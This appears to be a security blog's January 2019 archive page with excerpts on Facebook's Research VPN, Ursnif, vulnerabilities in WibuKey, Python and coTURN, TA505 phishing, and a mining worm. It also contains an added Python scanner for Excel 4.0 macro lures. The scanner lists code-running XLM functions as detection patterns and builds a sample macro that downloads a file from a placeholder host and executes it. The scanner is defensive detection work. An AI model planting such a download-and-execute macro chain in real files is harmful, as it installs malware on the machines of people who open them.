Archive for January, 2019

Desperate for data on its competitors, Facebook has been secretly paying people to install a “Facebook Research” VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August. Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic, in what may be a violation of Apple policy, so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms.

Cisco Talos once again spotted the Ursnif malware in the wild. We tracked this information stealer after Cisco’s Advanced Malware Protection (AMP) Exploit Prevention engine alerted us to these Ursnif infections. Thanks to AMP, we were able to prevent Ursnif from infecting any of its targets. The alert piqued our curiosity, so we dug a bit deeper and provide some recent IoCs related to this threat, which traditionally attempts to steal users’ banking login credentials and other login information.

Cisco Talos discovered two vulnerabilities that could allow remote code execution and memory disclosure at the kernel level in WIBU-SYSTEMS WibuKey. WibuKey is a USB key designed to protect software and intellectual property; it allows users to manage software licenses via the USB key. A third vulnerability is located in userland and can be triggered remotely, as it is located in the network manager.

Python contains an exploitable denial-of-service vulnerability in its X509 certificate parser. A specially crafted X509 certificate can cause a NULL pointer dereference, resulting in a denial of service. Python can crash if getpeercert() is called on a TLS connection that uses a certificate with an invalid DistributionPoint in its extensions.

Executive summary

Today, Cisco Talos is disclosing three vulnerabilities in coTURN. coTURN is an open-source implementation of TURN and STUN servers that can be used as a general-purpose networking traffic TURN server. TURN servers are usually deployed in so-called “DMZ” zones — any server reachable from the internet — to provide firewall traversal solutions.

Last month, the 360 Threat Intelligence Center captured multiple phishing emails sent by the TA505 group to target financial institutions. These phishing emails carry Excel attachments with an embedded Excel 4.0 macro that ultimately downloads a backdoor. This approach can bypass antivirus detection, and we have published a separate report explaining it in detail.

In December 2018, the 360 Threat Intelligence Center captured multiple samples of attacks against banking institutions using Excel 4.0 macros. The phishing document is an Office Excel document carrying a malicious Excel 4.0 macro, used to download and execute the final backdoor program. Using Excel 4.0 macros helps the attackers evade detection by security software. We have published detailed research on this technique in a separate report: Evade-detection.
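Both excerpts above describe the same technique: an Excel 4.0 (XLM) macro sheet, usually hidden and wired to an Auto_Open name, that downloads and runs a backdoor. The following scanner is an added example, not code from the 360 Threat Intelligence Center or from the reports it references. It assumes only the OOXML layout (macro sheets stored as parts under xl/macrosheets/, sheet visibility and defined names in xl/workbook.xml); the workbook it scans is constructed in memory with a made-up CALL/EXEC chain and the placeholder host example.invalid, so it is not a real lure and is not a file Excel will open.

```python
"""Flag Excel 4.0 (XLM) macro sheets in an OOXML workbook (added example).

Assumptions: XLM macro sheets live under xl/macrosheets/ with formulas in <f>
elements; sheet visibility ('state') and Auto_Open names are in xl/workbook.xml.
The sample workbook below is constructed for the demo, not a real sample.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# XLM functions that execute programs, load DLL exports or rewrite other cells.
SUSPICIOUS_XLM = {"EXEC", "CALL", "REGISTER", "RUN", "FORMULA", "FORMULA.FILL"}
# Function-name token followed by an opening parenthesis, e.g. EXEC( or FORMULA.FILL(
FUNC_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\s*\(")

SS_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
XLM_NS = "http://schemas.microsoft.com/office/excel/2006/main"


def _local(tag: str) -> str:
    """Strip the {namespace} prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def scan_workbook(data: bytes) -> dict:
    """Return macro sheets, hidden sheets, auto-run names and suspicious XLM calls."""
    report = {"macrosheets": [], "hidden_sheets": [], "auto_names": [], "hits": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "xl/workbook.xml" in names:
            for el in ET.fromstring(zf.read("xl/workbook.xml")).iter():
                tag = _local(el.tag)
                if tag == "sheet" and el.get("state") in ("hidden", "veryHidden"):
                    report["hidden_sheets"].append((el.get("name"), el.get("state")))
                elif tag == "definedName":
                    n = el.get("name", "")
                    if n.lower().startswith(("auto_open", "auto_close")):
                        report["auto_names"].append(n)
        for name in names:
            if not (name.startswith("xl/macrosheets/") and name.endswith(".xml")):
                continue
            report["macrosheets"].append(name)
            for cell in ET.fromstring(zf.read(name)).iter():
                if _local(cell.tag) != "c":
                    continue
                for child in cell:
                    if _local(child.tag) != "f" or not child.text:
                        continue
                    for fn in FUNC_RE.findall(child.text):
                        if fn in SUSPICIOUS_XLM:
                            report["hits"].append(
                                {"sheet": name, "cell": cell.get("r"),
                                 "function": fn, "formula": child.text})
    return report


def is_suspicious(report: dict) -> bool:
    """A macro sheet plus either a code-running call or an auto-run name is enough to alert."""
    return bool(report["macrosheets"]) and bool(report["hits"] or report["auto_names"])


def build_sample_xlsm(include_macro: bool = True) -> bytes:
    """Construct a minimal workbook zip; with include_macro it mimics the lure layout
    (very-hidden XLM sheet, Auto_Open name, download-then-execute chain)."""
    sheets = '<sheet name="Invoice" sheetId="1" r:id="rId1"/>'
    defined = ""
    if include_macro:
        sheets += '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        defined = '<definedNames><definedName name="Auto_Open">Macro1!$A$1</definedName></definedNames>'
    workbook = (f'<workbook xmlns="{SS_NS}" xmlns:r="{REL_NS}">'
                f'<sheets>{sheets}</sheets>{defined}</workbook>')
    worksheet = (f'<worksheet xmlns="{SS_NS}"><sheetData>'
                 '<row r="1"><c r="A1"><f>SUM(B1:B9)</f></c></row></sheetData></worksheet>')
    macrosheet = (  # constructed payload chain; example.invalid is a placeholder host
        f'<macrosheet xmlns="{XLM_NS}"><sheetData>'
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
        '"http://example.invalid/p.dat","C:\\Users\\Public\\p.exe",0,0)</f></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("C:\\Users\\Public\\p.exe")</f></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f></c></row></sheetData></macrosheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/worksheets/sheet1.xml", worksheet)
        if include_macro:
            zf.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("lure", build_sample_xlsm()), ("clean", build_sample_xlsm(False))):
        rep = scan_workbook(blob)
        print(label, "suspicious" if is_suspicious(rep) else "ok", rep["hits"])
```

To run it against real attachments, replace build_sample_xlsm() with the bytes of the .xlsm/.xlsx under review; legacy .xls (BIFF) lures need a BIFF parser instead, since their macro sheets are not XML parts.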

Recently, the 360 Threat Intelligence Center found that the mining worm that hijacked “Drive Life” was active again and issued an early warning (for details, see the center’s earlier article on the “Drive Life” mining worm). While analyzing the gang’s new activity, the center observed some phenomena related to the activities of the Mykings family, but could not draw definitive conclusions. They are shared here for the industry’s reference, in the hope that others can contribute further information so that a joint judgment can be reached.

Imagine you had a house: three bedrooms, two stories, one bathroom on a single-family lot. Now imagine that you wanted to expand this property to four stories, multiple units, and many bathrooms. What if we told you that you could build that dream house in two weeks, without lifting a single brick?

Meeting endpoint security challenges will take center stage for many enterprises in 2019, says Forrester Research in its latest endpoint research. The potency and diversity of attacker methods, an increased focus on user risk, and endpoint security professionals acting as data stewards are the three top trends voiced by security decision makers. These concerns will likely influence endpoint security purchases.